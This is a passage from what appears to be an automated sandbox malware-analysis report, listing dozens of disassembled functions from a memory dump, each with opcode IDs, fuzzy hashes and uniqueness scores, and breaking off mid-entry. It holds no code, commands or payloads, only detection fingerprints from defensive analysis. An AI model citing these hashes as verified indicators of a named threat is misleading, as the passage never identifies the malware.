                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c246d42dcb09f0c65d4288ebacec057a5cbcb48468b56ec8a154bbdb098d7f05
                                                • Instruction ID: 1f38e3e73e10b602d14b0392b4158e39b157df2c67e62a405d6db99043203e75
                                                • Opcode Fuzzy Hash: c246d42dcb09f0c65d4288ebacec057a5cbcb48468b56ec8a154bbdb098d7f05
                                                • Instruction Fuzzy Hash: C9419FB4E0420AEFDB05CFA5D8419EEBBB2FBC9310F14952AE505AB350D7709A51CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A2D12 Relevance: .1, Instructions: 113COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9667360cbda072c77f8566df46dc85c0c379f647c21a7dbc05717aec2d697e2
                                                • Instruction ID: 87c969d492c2688496ed8a753e7ad6e9c2ed193696fc5a88294ec5a134447140
                                                • Opcode Fuzzy Hash: c9667360cbda072c77f8566df46dc85c0c379f647c21a7dbc05717aec2d697e2
                                                • Instruction Fuzzy Hash: 21419FB5914609EFEB10CF68C4857AAB7B1FFC5340F104726E566972A3D334D8A18B52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A9100 Relevance: .1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3aead28214280e3f0fc0c20ff8dfe35976b7eadf0bffeb13026507271e0047c7
                                                • Instruction ID: 883789757be4d90d1cb6e865b166b118bb34453aaec7d5ba6e058688467f2171
                                                • Opcode Fuzzy Hash: 3aead28214280e3f0fc0c20ff8dfe35976b7eadf0bffeb13026507271e0047c7
                                                • Instruction Fuzzy Hash: 11415DB4E1020AEFDB44CF95D8419EEBBB2FB89350F109529D505AB354D7709A51CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077AB2DC Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5697d8209eb4347ba14f9fc5c89a77b936dcbd2fd8cff0a9c976f573a47a4aa6
                                                • Instruction ID: 4dc049b859d1ffdf8c71eaaa6fc61fab6fad66b5c7dedfc819897dad7b128155
                                                • Opcode Fuzzy Hash: 5697d8209eb4347ba14f9fc5c89a77b936dcbd2fd8cff0a9c976f573a47a4aa6
                                                • Instruction Fuzzy Hash: 80316DB6900219EFDB10DFA9D944ADEBFF5EF88350F10852AE405E7250D730A940CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077AE462 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e21d8736ddee1b86000f904ca7dc92b27407738a13119114c8eb993a96b17a09
                                                • Instruction ID: fe4b2f29e192efe8127ae781e154a6920e90ea4b03544694a19e3eb3d6b7d8e7
                                                • Opcode Fuzzy Hash: e21d8736ddee1b86000f904ca7dc92b27407738a13119114c8eb993a96b17a09
                                                • Instruction Fuzzy Hash: 053127B0B44201AFFB149A64AC0AB757B63BBC6355F19C6BAF0458F2C2DBB6C801C710
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A36A0 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e502c981ad89da3484447c76b006ebb99da9262373b9ac796a9b02587344cdf8
                                                • Instruction ID: 398828b1a61883f2dbd599a49621e2851ce747639f417d20e387fbc7a7ce86b6
                                                • Opcode Fuzzy Hash: e502c981ad89da3484447c76b006ebb99da9262373b9ac796a9b02587344cdf8
                                                • Instruction Fuzzy Hash: 1A3128F4915112FBE3004F54D4803B9B7B2FBC3399F198B76E4698B282C63AC841CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0167D36C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835183592.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_167d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5c3ce1aa2a57dc981dfb7c4adaa94f42f9bb4e2c03a595eae6f32a742de2352e
                                                • Instruction ID: 1f1f95000a7b656ddf1fa403f5fb25717dca2143a37bdf43483080df729a4e9b
                                                • Opcode Fuzzy Hash: 5c3ce1aa2a57dc981dfb7c4adaa94f42f9bb4e2c03a595eae6f32a742de2352e
                                                • Instruction Fuzzy Hash: 01210471504204DFDB05DF98D9C4B26BBA5FF84328F24C96DE9094B396C336E846CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0167D1B4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835183592.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_167d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 430a4ba790c7bc588eee5ab196928e3d4efb0bd98ebbe6b85a4a7a25092b0aad
                                                • Instruction ID: 5b71b9d980b83efa7639f6198fddb0b270e0a5fa1c094c5d07f13521c19ea111
                                                • Opcode Fuzzy Hash: 430a4ba790c7bc588eee5ab196928e3d4efb0bd98ebbe6b85a4a7a25092b0aad
                                                • Instruction Fuzzy Hash: E421F271604200DFDB05DF98D9C0B26BBA5FF84324F24C9ADEA4A4B356C336D847CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077AB339 Relevance: .1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6de3b4188a089bd934cd66362c2a188faa5ba9b4e5fcc1b22cdb4146ef0bd2b
                                                • Instruction ID: 16ba30ecada0eb56bfb094dd70d800fe5d591b05d8da97156067751b73a26cc7
                                                • Opcode Fuzzy Hash: d6de3b4188a089bd934cd66362c2a188faa5ba9b4e5fcc1b22cdb4146ef0bd2b
                                                • Instruction Fuzzy Hash: 5D2104F1E043469FCB12DB39884457FBFB6EFC5160705466AE454C7251EB308905C361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077AB0DC Relevance: .1, Instructions: 67COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8a04be948804f56a35ea4801ad5299a87e73475db7b47a63206199b5b6e6a25
                                                • Instruction ID: 95ef01071a7a895faa2e90d57424bba1bb1dcc58effc94980ef652f441a81f19
                                                • Opcode Fuzzy Hash: f8a04be948804f56a35ea4801ad5299a87e73475db7b47a63206199b5b6e6a25
                                                • Instruction Fuzzy Hash: 5A31F3B0D01218EFDB20DFAAC588B8EBFF4EB48314F64856AE404BB250C7B59844CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A0B70 Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 87fb0584b2f876151ab237089e627a2de3ab55ac026784f6a8e3620fec7a5290
                                                • Instruction ID: 6f08a1354a7728bd064213935f3635eaa7328cf211691702b1d6b3a5fc59ce24
                                                • Opcode Fuzzy Hash: 87fb0584b2f876151ab237089e627a2de3ab55ac026784f6a8e3620fec7a5290
                                                • Instruction Fuzzy Hash: 981103B1A18215DFFB148A68DD802BEB7A5FBC2265F048B7BD066C61D1D62CC900C211
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077AB504 Relevance: .1, Instructions: 64COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4bac8f3f2a51d9db4e6a7427d67190c60316a081e5d33a8f3fa385a76b09dc57
                                                • Instruction ID: c9f368b6dfa9f2657f8fb57dbf854e249060bbf41136d0daa2cfef6c6e1a373b
                                                • Opcode Fuzzy Hash: 4bac8f3f2a51d9db4e6a7427d67190c60316a081e5d33a8f3fa385a76b09dc57
                                                • Instruction Fuzzy Hash: 7131F2B0D01258EFDB20CFA9C588B8DBFF5EB48314F24855AE414BB254C7B59885CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A8EA0 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7b33ba9d61507caf137d9f6664d282cd88b9a03d48b436ecba7d43af5991464
                                                • Instruction ID: 7335fe0d7044ef39e02d2431258f8b96c23e59d79c9d2125b0e92a6e4f9bc9ed
                                                • Opcode Fuzzy Hash: d7b33ba9d61507caf137d9f6664d282cd88b9a03d48b436ecba7d43af5991464
                                                • Instruction Fuzzy Hash: B02190B4A10A08DFC704CF9AE084999BFF1FF8C318F5285D5E4889B325EB31A991CB05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077AC8A8 Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1992ee4ea3ee4321ecdd4e2f82d3c930db4968cef86122f12a70336d42080e8
                                                • Instruction ID: dd33a028f0ce78c50aae7061849b64d25a797141cd2c77fecc48801304f9593d
                                                • Opcode Fuzzy Hash: d1992ee4ea3ee4321ecdd4e2f82d3c930db4968cef86122f12a70336d42080e8
                                                • Instruction Fuzzy Hash: 831170B5E0D388EFDB06CB75C9196ADBFF5EF82200B2445EBD805C7652EA349D058721
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077AB2EC Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e7d06ae8a3a977840c61b76894ed803a6fb8ca68be8f5d155c441ab39cec8b8
                                                • Instruction ID: 5abd0aa5c75f62bdde54dd29a90f059662eb2b4470cd00107020b80861497ed4
                                                • Opcode Fuzzy Hash: 0e7d06ae8a3a977840c61b76894ed803a6fb8ca68be8f5d155c441ab39cec8b8
                                                • Instruction Fuzzy Hash: 762114B5900349AFCB10CF9AD984ADEBFF4FB48310F50842AE919A7310C375A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0167D367 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835183592.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_167d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 9d1a59667ff70ab208dce6c931875072af3eb3c0bb2acb9f1941e95486eb6f95
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 8A11BE75504240CFDB02CF54D9C4B55BF61FF84218F24CAA9D8094B756C33AE44ACB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0167D1AF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835183592.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_167d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: df34f7401c4d9fa24025e3d9c4277c2a9a90f2221743b613368dec805ab8f337
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 61119D75504280DFDB06CF54D9C4B15BFA1FF84328F28CAAAD9494B756C33AD44ACBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A6EC1 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf376b5a5da0dd63d161c1df07ec3db13a377f8ca762bcef44e5a62f887d91cd
                                                • Instruction ID: 83d73689a531bbe84917823dc00ff5f47d69b93f8bfe624477c31d61076bccbe
                                                • Opcode Fuzzy Hash: cf376b5a5da0dd63d161c1df07ec3db13a377f8ca762bcef44e5a62f887d91cd
                                                • Instruction Fuzzy Hash: 96010874A00208AFD704DFA9D998A9DBFF1AF89204F0AC0D5E448DB362D7309944CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077AC952 Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38115632b0e6e663ed0b93be2a3c1de50e865fb0fa511a962b563ef1cad9d422
                                                • Instruction ID: 1e938828c89f82816a3bd1afb820d273788751f426201624527b08f828419659
                                                • Opcode Fuzzy Hash: 38115632b0e6e663ed0b93be2a3c1de50e865fb0fa511a962b563ef1cad9d422
                                                • Instruction Fuzzy Hash: 45F0B472608119BFAB09DB69DC419FE7FBADFC4250B0581B7E404CB261E631AD5187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A6ED0 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe3aa2d55f699ddd118f41b1388b70f01b9dacc67312da8a4ab38b849fd20764
                                                • Instruction ID: cd165f29a304b429835b502eadfe864412c048229e7e2b82849692d69cd7798e
                                                • Opcode Fuzzy Hash: fe3aa2d55f699ddd118f41b1388b70f01b9dacc67312da8a4ab38b849fd20764
                                                • Instruction Fuzzy Hash: 9E01B674A00208AFDB44DFA9C584A9DBFF5EF88304F05C098A8489B365DB30D940CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A2C8A Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5258731aee36141f8036c6662f18a9fe1377adbad0fdb5102e560904555070d1
                                                • Instruction ID: fe5ee61792360f0ade36b58bbc1456e4442f90f5b8b08e06a82dddc27afa8596
                                                • Opcode Fuzzy Hash: 5258731aee36141f8036c6662f18a9fe1377adbad0fdb5102e560904555070d1
                                                • Instruction Fuzzy Hash: AEF0826605D3D16FE706AF7889A41927FA0EF57200B0654E7D0C0CE1B3E628884CC726
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077ADD60 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b1025bac0fc040b48501d99c8c39e5da089cc1a0cb4f9765d780f44895f1302
                                                • Instruction ID: c3e65a9cfd75f657c1de4a47f14f135233c0355a4f0a28b4f3dc59e7af16e59a
                                                • Opcode Fuzzy Hash: 9b1025bac0fc040b48501d99c8c39e5da089cc1a0cb4f9765d780f44895f1302
                                                • Instruction Fuzzy Hash: D7F0D0B0E1420AAFDB54DFA9C441A6EBFF4AB48300F10499AD514E7700D77095108B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077ADD50 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d56dac54abb220efa2de4dbca2b556f91a52129224cdb5b087b91eae86ea732
                                                • Instruction ID: dbf9f275202c800efbc07fb8e35e3d95c05ce1458095c70680281b49665ab5ee
                                                • Opcode Fuzzy Hash: 8d56dac54abb220efa2de4dbca2b556f91a52129224cdb5b087b91eae86ea732
                                                • Instruction Fuzzy Hash: 0BF062F0A1424A9FDB24CF69C445AAEBFB0AB49320F004A9A9560D7791DB758041CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077ADCF9 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48be06ed8503bd0d1611533f708699a9135d64f5d57112c5cf5f8432a75f4ffe
                                                • Instruction ID: e076edda6ec1f3744c6c63b8f2312766fc4253b702f243a3ca2b19de13339be6
                                                • Opcode Fuzzy Hash: 48be06ed8503bd0d1611533f708699a9135d64f5d57112c5cf5f8432a75f4ffe
                                                • Instruction Fuzzy Hash: 77E06DB5A44246AED720CF78C94868ABFF0AB4A275F2486D6C065CF6A6D77A41428B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A6526 Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 649703a5b6658120dfe7914590eef66bdaf38d993db468b4f11316a4d27b911e
                                                • Instruction ID: 38706a5a2bf6eb5f9579d14b425a3a5e2de6517126a2bdba8841e7140cd5aae3
                                                • Opcode Fuzzy Hash: 649703a5b6658120dfe7914590eef66bdaf38d993db468b4f11316a4d27b911e
                                                • Instruction Fuzzy Hash: 79F0FA74916329DFCB65DF65C984AD9BBB1FB19315F5002EAE84AA7210DB30AE91CF00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A5EE4 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 26ce9d53b96631cfc43972cdae3e4cf489bb63b2301342cb4b5c383a6efdbcaa
                                                • Instruction ID: 84c7008441240e9ddda274312f9b65c3c413f1cb25adf3f2e63a8cc048915e7f
                                                • Opcode Fuzzy Hash: 26ce9d53b96631cfc43972cdae3e4cf489bb63b2301342cb4b5c383a6efdbcaa
                                                • Instruction Fuzzy Hash: 31E086F0525348DFC715DFA1D0418A8BF75FF85355B101259E0039F224C735D991CE14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077ADD08 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: efe600a0385a693683c844f0cbce3c0cacaee4d309ddf6e92e62f6d0bd19c427
                                                • Instruction ID: f025b4bfdcb6632f5c3e3cd62a78a7253d4aeadeb6f8e790088a4a9726aef807
                                                • Opcode Fuzzy Hash: efe600a0385a693683c844f0cbce3c0cacaee4d309ddf6e92e62f6d0bd19c427
                                                • Instruction Fuzzy Hash: FEE092F4E40209AFD750EFA9C909A5EBBF0BB48600F1189AAD019E7215E7B496058F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A5E6C Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a367cc6d65f5c5902e4c97550f54d7cd00cb31610af14084b76a932602119cab
                                                • Instruction ID: ff843a8996afd995ce5ac3bd24bb9438221521a77e8bf01c5b7dae258319f750
                                                • Opcode Fuzzy Hash: a367cc6d65f5c5902e4c97550f54d7cd00cb31610af14084b76a932602119cab
                                                • Instruction Fuzzy Hash: 42E0C270521308DFCB54DFA1C445989BB70FF44341B1000A5E816CF26CD7368A81CF20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A3AAA Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 741dbddf307436359b124f82603463767b665b325d0c343a3e6eba5ca8e223d5
                                                • Instruction ID: 0c4efd9b766b59d0869938e9196ea8ba8fe0f5db6eb662ee1e1d6664516f88ea
                                                • Opcode Fuzzy Hash: 741dbddf307436359b124f82603463767b665b325d0c343a3e6eba5ca8e223d5
                                                • Instruction Fuzzy Hash: F9D0A9B1A0621CAFC200EABAA90A21A7AB8C346229F010150B84CC3100EE7110848A92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077ADE00 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f897c9d70b30a5715fd15ff0c1661d4d8c90e8651ec6c6e9153215b4a8d23f1a
                                                • Instruction ID: 06a97d7dfc8ee6fb85ee298f97c86c6108eb43384caa5cab11ca0279a3f98be9
                                                • Opcode Fuzzy Hash: f897c9d70b30a5715fd15ff0c1661d4d8c90e8651ec6c6e9153215b4a8d23f1a
                                                • Instruction Fuzzy Hash: 00D0123230410CAE5B60EE94E800C53B7DCBB78750B00C472F504C7424E721E575E752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A3AB0 Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db2b1f5818874a0e01d44f447fc19bf1a3bb7854616055f68bbe60300f27e5fd
                                                • Instruction ID: c68e6a4b644291aa666d56252d91e480374c6085f68e38d17ffd803c01ca683c
                                                • Opcode Fuzzy Hash: db2b1f5818874a0e01d44f447fc19bf1a3bb7854616055f68bbe60300f27e5fd
                                                • Instruction Fuzzy Hash: 85C012B051661CABC340EFFAA90A65A7AB8D74626AF0045A4B84883200EEB21580C6A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A411D Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
